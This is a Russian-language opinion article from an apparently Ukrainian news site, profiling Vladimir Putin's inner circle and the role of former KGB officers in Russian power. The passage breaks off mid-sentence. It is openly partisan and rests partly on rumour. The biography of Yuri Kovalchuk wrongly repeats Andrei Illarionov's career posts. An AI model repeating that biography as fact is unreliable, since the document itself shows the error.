><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">8</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9A%D0%BE%D0%BB%D0%BB%D0%B5%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D0%B9+%D0%9F%D1%83%D1%82%D0%B8%D0%BD+%D0%B8+%D0%B5%D0%B3%D0%BE+%D1%81%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%BD%D1%8B%D0%B5+%D1%87%D0%B0%D1%81%D1%82%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9A%D0%BE%D0%BB%D0%BB%D0%B5%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D0%B9+%D0%9F%D1%83%D1%82%D0%B8%D0%BD+%D0%B8+%D0%B5%D0%B3%D0%BE+%D1%81%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%BD%D1%8B%D0%B5+%D1%87%D0%B0%D1%81%D1%82%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1905-kollektivnyj-putin-i-ego-sostavnye-chasti"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4805539" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:0;">&nbsp;</p></div><div class="border">&nbsp;</div> <p><strong>Само собой якобы разумеющееся утверждение о том, что Россией правит Путин, 20-летие сидения на московском троне отмечалось в марте нынешнего года, при ближайшем рассмотрение является достаточно сомнительным, во всяком случае это отнюдь не аксиома. В сети имеется достаточно информации о том, что у Путина есть такой себе круг особо приближенных лиц, оказывающих влияние на принятие им решений, мнение которых он учитывает. Все это вполне в российских традициях, где со времен московских царей существовали так называемые ближние бояре. Не менее, возможно, даже более важным вопрос окружения Путина видится в свете продления или не продления им своих полномочий после истечения нынешней каденции в 2024 году, а также в смысле определения преемника Путина на московском «троне», тем более что ходят слухи о его более раннем отходе от дел…</strong></p> <div class="cblock"><img alt="Коллективный Путин и его составные части" src="/wp-content/uploads/2020/05/cover111-300x185.jpg" width="300"/></div> <p>Как и следовало ожидать, многие персонажи из окружения <a class="tag" href="https://enovosty.com/tag/putin" target="_blank">Путин</a>а являются выходцами из советских спецслужб. Но есть там и другие кадры, в том числе те, к интеллектуальным способностям которых имеются вопросы, о чем ниже, а в спецслужбах СССР дураков обычно не держали, информируют <a class="inform" href="https://enovosty.com/">Экономические Новости</a>.</p><p><strong>Коллективный Путин, открой личико!</strong></p><p>Кто же входит в ближайшее окружение Путина? На этот вопрос трудно дать однозначный ответ. Здесь можно сослаться на мнение российского политика и экономиста Андрея Илларионова (1961) &#8212; старшего научного сотрудника института Катона (США). В прошлом Илларионов был первым заместителем директора Рабочего центра экономических реформ при правительстве России (1992—1993), руководителем группы анализа и планирования при председателе правительства России (1993-1994), а главное – советником президента России Владимира Путина по экономике и доверенным лицом (шерпа) президента РФ в «Большой восьмерке» (2000-2005). Словом, Илларионов, находящейся сейчас в оппозиции к власти Путина, был составной частью этой власти на начальных ее этапах, хотя времени, как видно из приведенных выше дат, прошло очень много.</p><p>Итак, в ближайшее окружение Путина, по Илларионову, входят шесть человек, представляющих разные слои российского истеблишмента.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_abroad/full/1905-otnosheniya-rossii-i-kitaya-pravda-vyshla-naruzhu-piontkovskij" >Отношения России и Китая: правда вышла наружу, - Пионтковский</a></p><p>Прежде всего, это спецслужбисты советского разлива. Некоторые из приведенных персонажей в советское время и сразу после развала Союза учились с Владимиром Путиным (1952), служили с ним в <a class="tag" href="https://enovosty.com/tag/kgb" target="_blank">КГБ</a>, работали с ним в Ленинградском университете и в мэрии Ленинграда при Анатолии Собчаке.</p><div style="margin-bottom:10px;"><img src="https://enovosty.com/wp-content/uploads/2020/05/patrushev_ed2.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="119" class="alignleft size-full wp-image-4805565" srcset="https://enovosty.com/wp-content/uploads/2020/05/patrushev_ed2.jpg 100w, https://enovosty.com/wp-content/uploads/2020/05/patrushev_ed2-94x112.jpg 94w" sizes="(max-width: 100px) 100vw, 100px" /></p><p><strong>Николай <a class="tag" href="https://enovosty.com/tag/patrushev" target="_blank">Патрушев</a></strong> (1951) – директор Федеральной службы безопасности (ФСБ) в 1999-2008 годах, секретарь Совета безопасности Российской Федерации с мая 2008 года, генерал армии, выходец из КГБ.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_abroad/full/1105-v-parlamente-kanady-zaregistrirovana-peticiya-kotoraya-prizyvaet-priznat-putina-mezhdunarodnym-prestupnikom" >В Парламенте Канады зарегистрирована петиция, которая призывает признать Путина международным преступником</a></p></div><div style="margin-bottom:10px;"><img src="https://enovosty.com/wp-content/uploads/2020/05/aleksandr-bortnikov_ed2.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="119" class="alignleft size-full wp-image-4805566" srcset="https://enovosty.com/wp-content/uploads/2020/05/aleksandr-bortnikov_ed2.jpg 100w, https://enovosty.com/wp-content/uploads/2020/05/aleksandr-bortnikov_ed2-94x112.jpg 94w" sizes="(max-width: 100px) 100vw, 100px" /></p><p><strong>Александр <a class="tag" href="https://enovosty.com/tag/bortnikov" target="_blank">Бортников</a></strong> (1951) – нынешний директор ФСБ с 2008 года, генерал армии, председатель Национального антитеррористического комитета, председатель Совета руководителей органов безопасности и спецслужб стран СНГ. постоянный член Совета Безопасности Российской Федерации.</p></div><div style="margin-bottom:10px;"><img src="https://enovosty.com/wp-content/uploads/2020/05/ivanov_ed2.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="114" class="alignleft size-full wp-image-4805572" srcset="https://enovosty.com/wp-content/uploads/2020/05/ivanov_ed2.jpg 100w, https://enovosty.com/wp-content/uploads/2020/05/ivanov_ed2-98x112.jpg 98w" sizes="(max-width: 100px) 100vw, 100px" /></p><p><strong><a class="tag" href="https://enovosty.com/tag/sergej-ivanov" target="_blank">Сергей Иванов</a></strong> (1953) – спецпредставитель президента России по вопросам природоохранной деятельности, экологии и транспорта, постоянный член Совета Безопасности Российской Федерации, председатель совета директоров АО «Ростелеком»; генерал-полковник в отставке; в прошлом кадровый сотрудник КГБ СССР и Службы внешней разведки России (1991-1998), министр обороны России (2001-2007), глава администрации президента России (2011-2016).</p></div><div style="margin-bottom:10px;"><img src="https://enovosty.com/wp-content/uploads/2020/05/narishkin_ed2.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="126" class="alignleft size-full wp-image-4805574" srcset="https://enovosty.com/wp-content/uploads/2020/05/narishkin_ed2.jpg 100w, https://enovosty.com/wp-content/uploads/2020/05/narishkin_ed2-89x112.jpg 89w" sizes="(max-width: 100px) 100vw, 100px" /></p><p><strong>Сергей <a class="tag" href="https://enovosty.com/tag/naryshkin" target="_blank">Нарышкин</a></strong> (1954) – директор Службы внешней разведки России, постоянный член Совета безопасности России, действительный государственный советник 1 класса. В прошлом сотрудник КГБ СССР, в 2008-2011 годах – глава администрации президента России, в 2011-2016 годах – председатель Госдумы России VI созыва.</p></div><div style="margin-bottom:10px;"><img src="https://enovosty.com/wp-content/uploads/2020/05/kovalchuk_ed2.png" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="123" class="alignleft size-full wp-image-4805575" srcset="https://enovosty.com/wp-content/uploads/2020/05/kovalchuk_ed2.png 100w, https://enovosty.com/wp-content/uploads/2020/05/kovalchuk_ed2-91x112.png 91w" sizes="(max-width: 100px) 100vw, 100px" /></p><p><strong>Юрий <a class="tag" href="https://enovosty.com/tag/kovalchuk" target="_blank">Ковальчук</a></strong> (1951) – со спецслужбами официально, вроде бы, связан не был; до 1991 года был замдиректора Физико-технического института им. Иоффе в Ленинграде; в начале 1990-х годов занимался предпринимательской деятельностью в Петербурге и познакомился с Путиным, работавшим в мэрии у Собчака; один из соучредителей скандально знаменитого дачного кооператива «Озеро» под Петербургом, в котором состоит и Путин; первый заместитель директора Рабочего центра экономических реформ при Правительстве России (1992—1993), руководитель группы анализа и планирования при председателе правительства России (1993—1994), советник президента Путина по экономике и доверенное лицо (шерпа) президента РФ в «Большой восьмерке» (2000-2005); в 2005-2012 годах — председатель совета директоров банка «<a class="tag" href="https://enovosty.com/tag/rossiya" target="_blank">Россия</a>»; в 2008 году при участии Ковальчука создана «Национальная Медиа Группа», в которую входят РЕН ТВ, Первый канал, Пятый канал, «Известия» и другие СМИ.</p></div><div style="margin-bottom:10px;"><img src="https://enovosty.com/wp-content/uploads/2020/05/vaino_ed2.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="129" class="alignleft size-full wp-image-4805576" srcset="https://enovosty.com/wp-content/uploads/2020/05/vaino_ed2.jpg 100w, https://enovosty.com/wp-content/uploads/2020/05/vaino_ed2-87x112.jpg 87w" sizes="(max-width: 100px) 100vw, 100px" /></p><p><strong>Антон <a class="tag" href="https://enovosty.com/tag/vajno" target="_blank">Вайно</a></strong> (1972) – глава администрации президента России с августа 2016 года, постоянный член Совета безопасности России, действительный государственный советник России 1-го класса; окончил привилегированный Московский государственный институт международных отношений (МГИМО); родился в Таллинне, имеет эстонские, революционные и партийные корни; его прадед Хейнрих Вайно устанавливал советскую власть в Сибири, в частности воевал со знаменитым чехословацким корпусом, растянутым по всей Транссибирской магистрали от Урала до Дальнего Востока; дед Карл Вайно был партийным работником, в 1978-1988 годах занимал пост первого секретаря ЦК компартии в Эстонской ССР; отец Эдуард Вайно – известный предприниматель в постсоветской России.</p></div><div style="margin-bottom:10px;"><img src="https://enovosty.com/wp-content/uploads/2020/05/zolotov_ed2.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="131" class="alignleft size-full wp-image-4805577" srcset="https://enovosty.com/wp-content/uploads/2020/05/zolotov_ed2.jpg 100w, https://enovosty.com/wp-content/uploads/2020/05/zolotov_ed2-85x112.jpg 85w" sizes="(max-width: 100px) 100vw, 100px" /></p><p>Есть еще один персонаж, которого Илларионов не называет в числе приближенных Путина, но медиа его таковым считают. Это <strong>Виктор <a class="tag" href="https://enovosty.com/tag/zolotov" target="_blank">Золотов</a></strong> (1954) – генерал армии, директор Федеральной службы войск национальной гвардии, командующий войсками Нацгвардии России. По ряду объективных причин трудно представить, как этот индивид может влиять на принятие государственных решений, но молва приписывает ему именно такие возможности. </p></div><p>Золотова привел во власть Александр Коржаков, бывший руководитель охраны бывшего президента России Бориса Ельцина, а затем глава его избирательного штаба на выборах 1996 года. Незадолго до знаменитого путча 1991 года, окончательно похоронившего СССР, Золотов прямо из заводского цеха, где, по словам Коржакова, он «крутил гайки», был принят в подчинение Коржакова в качестве простого телохранителя Ельцина. Коржаков крайне нелестно отзывается о своем бывшем подчиненном и протеже. В присущей ему манере, Коржаков <a href="https://gordonua.com/publications/korzhakov-zolotov-prishel-ko-mne-slesarem-gajki-krutil-togda-on-tyanul-na-oligofrena-sejchas-uzhe-na-imbecila-349212.html" target="_blank" rel="nofollow noopener noreferrer">заявил</a>: «Золотов пришел ко мне слесарем, гайки крутил; тогда он тянул на олигофрена, сейчас уже на имбецила». Не вдаваясь в подробности о том, что Коржаков несколько запутался в понятиях «олигофрен» и имбецил», отметим колоритность и показательность такой характеристики, которая оправдывается поведением Золотова, в частности угрозами в адрес не менее одиозного оппозиционера Навального, которого Золотов в <a href="https://www.rbc.ru/politics/11/09/2018/5b97e1d29a7947702872aecf" target="_blank" rel="nofollow noopener noreferrer">видео-ролике</a> обещает превратить в «сочную отбивную». Правда, будучи хоть каким, но офицером, Золотов обещает это сделать на дуэли, а не методом «гопоты из подворотни».</p><p>Однако, несмотря на указанные качества и шлейф коррупционных скандалов, Золотов стремительно вознесся по карьерной лестнице. В 2000-2013 годах, то есть с самого начала царствования Путина, он возглавлял службу безопасности президента России, будучи также заместителем директора Федеральной службы охраны, а затем возглавил Росгвардию, которой командует до сих пор.</p><p>Для справки. Российская нацгвардия, как и нацгвардия в Украине, – это бывшие Внутренние войска, входившие в состав Министерства внутренних дел (МВД). Но если в Украине они так и остались в подчинении МВД, то в России она является отдельным формированием, подчиненным непосредственно Путину. В медиа ходят слухи, что Нацгвардия является личной армией Путина. И если исходить из этого, то тогда объясним тот факт, что на должности командующего этой личной армией находится индивид, мягко говоря, не блещущий интеллектом и даже замаранный в коррупции, но являющийся «своим в доску», поскольку без Путина у него нет никаких перспектив вообще.</p><p>Кстати, по слухам, именно личной дружбой Золотова с Кадыровым якобы объясняется тот факт, что Кадырову сходят с рук многие его выходки. Считается, что если бы у Кадырова не было «крыши» в лице «приближенного к Главному Телу» Золотова, то участь Кадырова была бы несколько иной, а скорее всего, он не позволял бы себе того, что безнаказанно вытворяет, тем более в российской системе координат.</p><p><img src="https://enovosty.com/wp-content/uploads/2020/05/kadirov_zolotov.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="640" height="379" class="aligncenter size-full wp-image-4805595" srcset="https://enovosty.com/wp-content/uploads/2020/05/kadirov_zolotov.jpg 640w, https://enovosty.com/wp-content/uploads/2020/05/kadirov_zolotov-112x66.jpg 112w, https://enovosty.com/wp-content/uploads/2020/05/kadirov_zolotov-300x178.jpg 300w, https://enovosty.com/wp-content/uploads/2020/05/kadirov_zolotov-460x272.jpg 460w" sizes="(max-width: 640px) 100vw, 640px" /></p><p>О других лицах, которых приписывают к окружению Путина, будет сказано ниже. Сейчас были приведены подробности только о Золотове как о слишком колоритном персонаже. Уроженец Рязанской области Золотов, работавший в молодости на московском автозаводе АЗЛК, также является иллюстрацией того, что в окружение Путина входят не только выходцы из КГБ или даже просто из Ленинграда времен Собчака.</p><p>Обращает внимание еще одно любопытное обстоятельство. Почти все те, кого считают окружением Путина, родились в первой половине 1950-х годов, то есть им уже далеко за 60 лет, собственно, уже под 70, включая и самого Путина.</p><p>Исключение, как показано выше, составляет Антон Вайно, который примерно на 20 лет моложе всех остальных и практически не имеет советского прошлого. В этом смысле возникают сомнения в том, насколько он может вообще оказывать влияние на принятие Путиным решений.</p><p><img src="https://enovosty.com/wp-content/uploads/2020/05/igor-sechin_ed2.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="100" height="124" class="alignleft size-full wp-image-4805578" srcset="https://enovosty.com/wp-content/uploads/2020/05/igor-sechin_ed2.jpg 100w, https://enovosty.com/wp-content/uploads/2020/05/igor-sechin_ed2-90x112.jpg 90w" sizes="(max-width: 100px) 100vw, 100px" />Кроме того, среди тех, кого указывают в качестве окружения Путина, почему-то не называют некоторых других персонажей, которые, как следует из обильной информации из медиа, имеют с Путиным давние доверительные отношения. Ярким примером может служить нынешний глава «Роснефти» и уроженец Ленинграда <strong>Игорь Сечин</strong> (1960), ранее бывший заместителем главы администрации президента России (1999-2008), а в 2004-2008 годах – также помощник президента; заместитель председателя правительства Российской Федерации (2008-2012).</p><p>Сечин считается одним из самых влиятельных людей в России и одним из самых близких к Путину. Познакомились они на рубеже 80-90-х годов во время совместной работы в Ленинградском университете и в мэрии Петербурга. Именно Сечина называют вдохновителем преследования владельцев нефтяной компании «ЮКОС», основные активы которой впоследствии перешли к «Роснефти».</p><p>Именно с Сечиным связан интересный эпизод, который свидетельствует о том, что Путин, как минимум, не всегда прислушивается к советам своего окружения при принятии важных решений, а принимает их сам, причем потом виновниками могут публично объявить кого-то из окружения. Считается, что именно Сечин настоял на том, чтобы отказаться в начале марте от подписания Россией в формате ОПЕК+ соглашения об ограничении добычи нефти, чтобы остановить катастрофическое падение цен на нее. Правда, оказалось, что причина не только и не столько даже в уровне добычи, а еще в том, что с 2019 года резкому падению цен на черное золото способствует целый комплекс факторов, прежде всего, углубляющийся мировой кризис, усугубленный пандемией и еще больше истерией вокруг нее, но в подробности вдаваться не будем, поскольку не так давно об этом уже приходилось подробно <a href="https://enovosty.com/ekonomika/full/2704-velikij-neftyanoj-potop-v-zerkale-novogo-globalnogo-krizisa" target="_blank" rel="nofollow noopener noreferrer">писать</a>.</p><p>Здесь для нас важно, кто именно принимал такое решение. Считается, что это был Сечин, которого за это не так давно всячески поносили, в том числе, в российских СМИ, причем далеко не только так называемые русские оппозиционеры, но и лица, вмонтированные в российскую власть. Но российский историк и политолог Валерий Соловей утверждает, что решение об отказе от подписания Россией соглашения в формате ОПЕК+ принимал лично Путин, а Сечину было поручено, выражаясь блатным языком, «держать мазу» за Путина, чтобы еще сильнее не ронять авторитет последнего в то время, когда рейтинги Путина падают. Трудно сказать, насколько такое утверждение соответствует действительности, а утверждения Соловья выглядят не слишком убедительно, поскольку он ссылается на некие неназываемые инсайдерские источники, и известно, что «кремлевские сплетни» часто трудно, даже невозможно отделить от «кремлевских тайн». Впрочем, исключать такого тоже нельзя…</p><p><iframe width="560" height="315" src="https://www.youtube.com/embed/Ltn5F0mhhvo" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><p><strong>Власть бесконтрольной «ГэБни»</strong></p><p>Прежде чем перейти к вопросу о том, кто из «коллективного Путина» и как именно влияет или может влиять на принятие тех или иных решений, а также о продлении или не продлении полномочий Путина и возможном его преемнике, следует кратко охарактеризовать саму систему власти в нынешней России.</p><p>Тот факт, что реальную власть в стране имеют выходцы из советских спецслужб, включая Путина и большинство его ближайшего окружения, обычно принято интерпретировать как создание в современной России спецслужбистского государства по примеру СССР.</p><p>Однако это далеко не так, поскольку в СССР, вопреки расхожим мифам, спецслужбы никогда не стояли во главе государства, не возглавляли его и спецслужбисты. Исключение составляет очень короткое правление Юрия Андропова в ноябре 1982 – феврале 1984 годов, причем значительную часть этого срока генеральный секретарь Андропов был тяжело болен, фактически находился при смерти, уровень спецслужбиста он к тому времени давно перерос, а нынешние спецслужбисты при власти в России и близко не дотягивают по уровню до Андропова. Впрочем, Андропов – это отдельная интересная тема.</p><p>В СССР спецслужбы никогда властью не были. Наоборот, они всегда находились под контролем либо партийного аппарата, либо под личным контролем Сталина, который во многом подменял собой партийный аппарат. Даже в самом понятии «сталинских репрессий НКВД» в 1930-х годах ключевым следует, по нашему скромному разумению, считать слово «сталинский», а не «НКВД», поскольку именно Сталин «контролировал процесс» и спецслужбы. Об этом свидетельствует тот факт, что целый ряд руководителей НКВД, когда они становились ненужными или переступали некую черту, безжалостно уничтожались по команде того же Сталина. Эта участь постигла Генриха Ягоду, Николая Ежова, которые были в крови даже не по локоть, а по самую макушку, не говоря уже о сотнях и тысячах функционеров более мелкого масштаба, которых регулярно «зачищали» после выполнения ими грязной работы. </p><p>Лаврентий Берия пытался занять лидирующую позицию после смерти Сталина, но ему это не дали сделать Никита Хрущев, Георгий Маленков, Николай Булганин и другие бывшие «сталинские орлы» при поддержке маршала Константина Жукова. Причем, в отличие от своих предшественников на должности руководителей НКВД-МГБ, Берия – при всех его известных особенностях, это был куда более высокий уровень, поскольку кроме спецслужб и карательных органов возглавлял новые направления – разработку ракетной техники, ядерного оружия и так далее. Но он был уничтожен своими бывшими подельниками не только из-за боязни, но также из-за того, чтобы спецслужбы не смогли оседлать государство.</p><p>Ведь одной из важных целей десталинизации, проводившейся во времена Хрущева, было взятие спецслужб и карательных органов под жесткий партийно-государственный контроль, недопущение в дальнейшем ситуации, когда спецслужбы и выходцы из них правят бал в стране, подминая под себя власть, государство и партию, которая тогда была важнейшим элементом всей советской конструкции. Кратковременный приход к власти многолетнего главы КГБ Андропова, по сути, только подтвердил тот факт, что спецслужбы к концу правления Брежнева, которого сменил Андропов, находились под жестким партийным контролем.</p><p>Именно партийные органы в поздний советский период решали кадровый вопрос в спецслужбах, ставили задачи, требовали отчета о выполнении. Причем руководство это было коллективным, пусть даже с учетом позднебрежневских «геронтологических» особенностей, поскольку руководил спецслужбами не самолично генеральный секретарь партии, а, как минимум, политбюро ЦК, а шире – ЦК партии. Более того, в назначении на руководящие должности КГБ принимали участие государственные органы, например президиум Верховного совета СССР. Наконец, официально советская спецслужба называлась «КГБ при Совете министров СССР», то есть, наряду, например, с тогдашним министерством мясомолочной промышленности, это было такое себе «министерство госбезопасности», кстати, именно так его называли сразу после войны, когда вместо наркоматов в 1946 году ввели министерства, в том числе МГБ во главе с Виктором Абакумовым.</p><p>После этого необходимого, по нашему мнению, экскурса в историю вернемся в современную Россию. Ее особенностью является то, что ей действительно заправляет своего рода «взбесившаяся ГэБня», ничем и никем не ограниченная в своих действиях. Путин и значительная часть его окружения в середине и второй половине 1980-х занимали низовые должности и ходили в чинах не выше майора, максимум, подполковника. Об этом хорошо <a href="http://www.e-reading.club/bookreader.php/34455/aleksandr-litvinenko-lubyanskaya-prestupnaya-gruppirovka.html" target="_blank" rel="nofollow noopener noreferrer">сказано</a> в книге убиенного своими бывшими сослуживцами в Британии советского спецслужбиста Александра Литвиненко «Лубянская преступная группировка». Уровень интеллекта Путина и окружения – это далеко не уровень Андропова, даже Берии, других ведущих руководителей советских спецслужб. Кроме того, советское государство, по крайне мере, на уровне лозунгов, декларировало некие высшие ценности, например «построение светлого коммунистического будущего». В современной России налицо тупая военщина, полицейщина, жажда наживы, империалистическая агрессия, национализм и шовинизм при полном отсутствии хотя бы малейших экзистенциальных изысков на тему «светлого будущего», «царства небесного», вообще чего-либо в этом роде.</p><p>Находящиеся сейчас у руля низовые выходцы из спецслужб в принципе не состоянии ничего такого сформулировать. Более того, у них вообще подобные вещи отсутствуют в «когнитивной матрице».</p><p>Об этом хорошо сказано в упомянутой книге Александра Литвиненко: </p><p>«Нечто подобное случилось и со спецслужбами — тоже ведь Истребители своего народа, скольких истребили! Они всегда мечтали о власти — но власть была не у них, а у КПСС. И вот они добились её. И тут обнаруживается, что не могут они без штурвала. Раньше они хоть каким-то делом занимались — партноменклатуру охраняли, боролись с влиянием Запада, мацу из еврейских посылок изымали, а теперь вот остались без дела, занимаются банальным разбоем.</p><p>Всё точно по Высоцкому: полная неспособность к самостоятельным решениям. Система привыкла исполнять, решать задачи, но не формулировать их. Одно дело — выполнять указания политического руководства страны, другое — быть этим руководством».</p><p>Кстати, что касается книги Литвиненко, то, за исключением разве только темы взрывов в 1999 году, якобы приведших к власти Путина и его клику, о чем достаточно сказано во множестве других источников, именно процитированное выше место из этой книги является, пожалуй, самым сильным, передающим самую суть путинской власти в России.</p><p><strong>«Кто есть ху» в коллективном Путине</strong></p><p>И все же будем исходить из того, что «коллективный Путин» реально существует и оказывает влияние на принятие решений в России. А этом смысле, следует рассмотреть отдельных действующих лиц и исполнителей, их послужной список и взгляды.</p><p>Ссылаясь на находящегося в эмиграции российского оппозиционера Андрея Пионтковского, его тезка, упомянутый выше Андрей Илларионов самым опасным человеком в окружении Путина называет бывшего директора ФСБ, а ныне секретаря Совета безопасности России <strong>Николая Патрушева</strong>. Родившийся в Ленинграде в 1951 году, Патрушев учился в одном классе с еще одним видным российским деятелем – Борисом Грызловым, бывшим министром внутренних дел России (2001-2003), главой Госдумы (2003-2011), председателем Высшего совета партии «Единая Россия», с декабря 2015 года – представителем России в переговорной трехсторонней контактной группе (ТКГ) по Донбассу.</p><p><img src="https://enovosty.com/wp-content/uploads/2020/05/patrushev2_ed.jpg" title="Коллективный Путин и его составные части" alt="Коллективный Путин и его составные части" width="640" height="396" class="aligncenter size-full wp-image-4805553" srcset="https://enovosty.com/wp-content/uploads/2020/05/patrushev2_ed.jpg 640w, https://enovosty.com/wp-content/uploads/2020/05/patrushev2_ed-112x69.jpg 112w, https://enovosty.com/wp-content/uploads/2020/05/patrushev2_ed-300x186.jpg 300w, https://enovosty.com/wp-content/uploads/2020/05/patrushev2_ed-460x285.jpg 460w" sizes="(max-width: 640px) 100vw, 640px" /></p><p>В 1974 году Патрушев окончил Ленинградский кораблестроительный институт и недолгое время работал в институтском конструкторском бюро. Очевидно, участь «простого советского инженера» его не прельщала, поэтому в 1974-1975 годах он был слушателем высших курсов КГБ в Минске. С 1975 года работал в контрразведывательном подразделении управления КГБ СССР по Ленинградской области: младший оперуполномоченный, оперуполномоченный, начальник горотделения, заместитель начальника райотдела, начальник службы по борьбе с контрабандой и коррупцией. Окончил годичные курсы повышения квалификации при Высшей школе КГБ СССР.</p><p>Первую половину службы в госбезопасности Патрушев занимался организацией рыбалки, охоты и прочих развлечений для руководства ленинградского КГБ. &#171;Патрушев был моим помощником, &#8212; вспоминает бывший генерал-майор КГБ СССР Олег Калугин. &#8212; Вместе на охоту ездили&#187;. Экс-разведчик КГБ Юрия Швец: &#171;Он (Патрушев), как и Путин, работал в ленинградском управлении КГБ, был специалистом по организации охоты и рыбалки для руководства. Такой &#171;егерь&#187; был практически в каждом управлении КГБ, вывозил начальство на природу, накрывал поляну&#187;. Очень интересную характеристику Патрушеву дает Калугин: «… все спрашивал и спрашивал меня, почему мало сажаем, очень хотел показать, какой он изобретательный». &#171;Был случай, &#8212; вспоминает Калугин, &#8212; когда один диссидент в Кировске мешал партийным властям. Они говорили: «Почему вы держите этого клеветника, почему не посадите?&#187;. Как рассказывает Калугин, оказалось, что тот, кого называли клеветником, честно говорил о проблеме очередей, дефиците продуктов, бюрократизме, неспособности власти справиться с проблемами. &#171;С ним надо разобраться&#187;, &#8212; заявил Патрушев со слов Калугина. &#171;Патрушев решил устроить провокацию, чтобы его посадить. Я его остановил &#8212; не надо сажать человека в тюрьму без оснований. Но он был не очень доволен, что его инициатива не получила поддержки&#187;, &#8212; вспоминает генерал.</p><p>В 1985 году крупный карьерный провал постиг многих функционеров ленинградского подразделения КГБ, включая самого Путина, работавшего здесь с 1977 года по линии контрразведки, а также ряд персонажей из нынешнего окружения Путина, которые в это время работали там же. Речь идет о побеге за границу полковника Первого главного управления КГБ (разведка) Олега Гордиевского, руководителя советской резидентуры в Лондоне, который работал на Британию 11 лет. После возникновения подозрений Гордиевский был отозван в СССР, но сумел уйти за кордон в июле 1985 году как раз через Ленинградскую область в Финляндию, то есть местные функционеры КГБ его уход прошляпили. Это вызвало гнев начальства, и эти функционеры, не занимавшие, впрочем, слишком уж высоких постов, были разбросаны по разным местам.</p><p>Например, Путин оказался в качестве резидента внешней разведки в Восточной Германии под прикрытием в должности директора Дома дружбы СССР-ГДР в Дрездене. С одной стороны, это не так уж и плохо по сравнению, например, с Урюпинском, но слишком уж его должность смахивает на «завклубом». Сергей Иванов, еще один персонаж из нынешнего окружения Путина, очутился в далекой и опасной Кении, по сравнению с которой «заведующий Дрезденским клубом» Путин таки неплохо устроился.</p><p>Сильно не повезло Патрушеву. Вместо престижного Ленинграда &#8212; второй, фактически первой, столицы России, он оказался не слишком далеко от города на Неве, но в захолустье – в соседней Карелии, где и встретил развал СССР. В своей книге Литвиненко описывает, как Патрушев в Карелии был обвинен в незаконных сделках по продаже карельской березы. Было начато уголовное расследование.</p><p>Некоторое время работал на разных должностях в местных спецслужбах, но затем сумел перебраться в Москву, где в 1994-1998 годах был начальником Управления собственной безопасности ФСБ России и занимался кадровыми вопросами.</p><p>Карьера Патрушева пошла вверх после появления в Москве другого выходца из ленинградского КГБ – Владимира Путина, который после канцелярской работы в администрации президента Ельцина был в мае 1998 года назначен директором ФСБ. </p><p>Обратим внимание на следующее. Путин дослужился в советском КГБ всего лишь до подполковника, занимая далеко не ведущие должности, его карьера была не слишком успешной, то есть опыта, достаточного для занятия должности главы ФСБ, у него просто не было, и быть не могло. С развалом Союза он и вовсе подал в отставку, занимал мелкие должности в Ленинградском университете и в мэрии Петербурга, обретя к тому же, отчетливую коррупционно-криминальную репутацию. И вдруг такой бешеный, как сейчас модно говорить, «социальный лифт»: из мелкого чиновника – в 